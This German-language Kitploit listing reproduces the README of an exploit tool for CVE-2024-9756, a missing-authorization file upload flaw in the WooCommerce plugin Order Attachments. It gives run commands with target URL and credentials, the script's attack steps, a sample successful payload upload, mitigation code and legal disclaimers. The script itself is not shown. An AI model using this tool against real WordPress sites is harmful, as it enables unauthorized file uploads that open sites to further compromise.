Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-9756 — Order Attachments for WooCommerce 2.0 - 2.4.1 - Fehlende Autorisierung authentifizierter Benutzer (Subscriber+) für eingeschränkten beliebigen Datei-Upload | Kitploit
Tools/GitHubGitHub/nxploited/cve-2024-9756
SchwachstellenanalyseExploitationWebanwendungs-ExploitationWebsicherheitPenetrationstestsLernen & Bildung
GitHubnxploited/cve-2024-9756

CVE-2024-9756

Order Attachments for WooCommerce 2.0 - 2.4.1 - Fehlende Autorisierung authentifizierter Benutzer (Subscriber+) für eingeschränkten beliebigen Datei-Upload

Repository anzeigen
1vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

🚀 WooCommerce-Exploit für beliebigen Datei-Upload (CVE-2024-9756)

📌 Überblick

Dieser Exploit nutzt eine unautorisierte, eingeschränkte Schwachstelle für beliebigen Datei-Upload im Plugin Order Attachments for WooCommerce (Versionen 2.0 bis 2.4.1) für WordPress.
Die Schwachstelle erlaubt es authentifizierten Benutzern (Subscriber+), eingeschränkte Dateitypen ohne entsprechende Autorisierung hochzuladen.

⚠️ Haftungsausschluss

Dieses Skript dient ausschließlich Bildungs- und Sicherheitsforschungszwecken. Jegliche unbefugte Nutzung dieses Exploits auf Systemen, die Sie nicht besitzen, ist strengstens illegal.


🔗 CVE-Details

  • CVE ID: CVE-2024-9756
  • Verwundbares Plugin: Order Attachments for WooCommerce
  • Betroffene Versionen: 2.0 bis 2.4.1
  • Art der Schwachstelle: Fehlende Autorisierung für authentifizierten beliebigen Datei-Upload
  • Voraussetzung für die Ausnutzung: Gültiger WordPress-Login mit mindestens der Rolle „Subscriber“
  • Mögliche Auswirkungen: Eingeschränkte Datei-Uploads, die für weitere Angriffe genutzt werden können.

⚙️ Voraussetzungen

Stellen Sie sicher, dass Sie Folgendes haben, bevor Sie den Exploit ausführen:

✅ Abhängigkeiten

  • Python 3.x
  • requests-Modul → Installation mit:
    root@kitploit:~
    pip install requests
    
  • WordPress-Zielwebsite mit installiertem verwundbaren Plugin.

✅ WordPress-Benutzerberechtigungen

  • Erfordert Subscriber+-Zugriff, um den Exploit zu nutzen.

🚀 Nutzung des Exploits

🔹 Exploit ausführen

root@kitploit:~
python3 CVE-2024-9756.py -u <TARGET_URL> -un <USERNAME> -p <PASSWORD>

Beispiel:

root@kitploit:~
python3 CVE-2024-9756.py -u http://192.168.100.74:888/wordpress4 -un khaled -p mypassword

🔧 Erweiterte Nutzung

Sie können benutzerdefinierte Dateinamen und Auftrags-IDs angeben:

🔹 Bestimmte Datei hochladen

root@kitploit:~
python3 CVE-2024-9756.py -u <TARGET_URL> -un <USERNAME> -p <PASSWORD> --filename="custom.png" --filetype="image/png"

🔹 Datei an eine andere Auftrags-ID anhängen

root@kitploit:~
python3 CVE-2024-9756.py -u <TARGET_URL> -un <USERNAME> -p <PASSWORD> -o 200

📌 Verhalten des Skripts

  1. Authentifiziert sich bei WordPress mit den angegebenen Anmeldedaten.
  2. Überprüft, ob die Datei lokal vorhanden ist, bevor sie hochgeladen wird.
  3. Führt den Datei-Upload-Exploit über den verwundbaren AJAX-Endpunkt aus.
  4. Analysiert die Serverantwort und extrahiert die URL der hochgeladenen Datei.

✅ Erwartete Ausgabe

Bei Erfolg gibt das Skript die URL der hochgeladenen Datei zurück:

root@kitploit:~
[*] Initiating authentication...
[✔] Authentication successful.
[*] Deploying payload: Nxploit.jpg to order 196...
[✔] Payload successfully deployed!
🔗 File URL: http://192.168.100.74:888/wordpress4/wp-content/uploads/2025/03/Nxploit.jpg

🔥 Gegenmaßnahmen & Fixes

  • Aktualisieren Sie das Plugin auf die neueste gepatchte Version.
  • Beschränken Sie die Datei-Upload-Berechtigungen auf Administratoren.
  • Ändern Sie functions.php, um wp_ajax_wcoa_add_attachment für unbefugte Benutzer zu blockieren:
    root@kitploit:~
    if (!current_user_can('manage_woocommerce')) {
        wp_send_json_error(['message' => 'Unauthorized'], 403);
        exit;
    }
    

🛑 Rechtlicher Hinweis

Dieser Exploit wird ausschließlich zu Bildungszwecken und für Sicherheitsforschung veröffentlicht.
Unbefugte Nutzung gegen Systeme ohne ausdrückliche Genehmigung ist illegal und wird nach Cybersicherheitsgesetzen bestraft.
Nutzung auf eigenes Risiko.


Tool herunterladen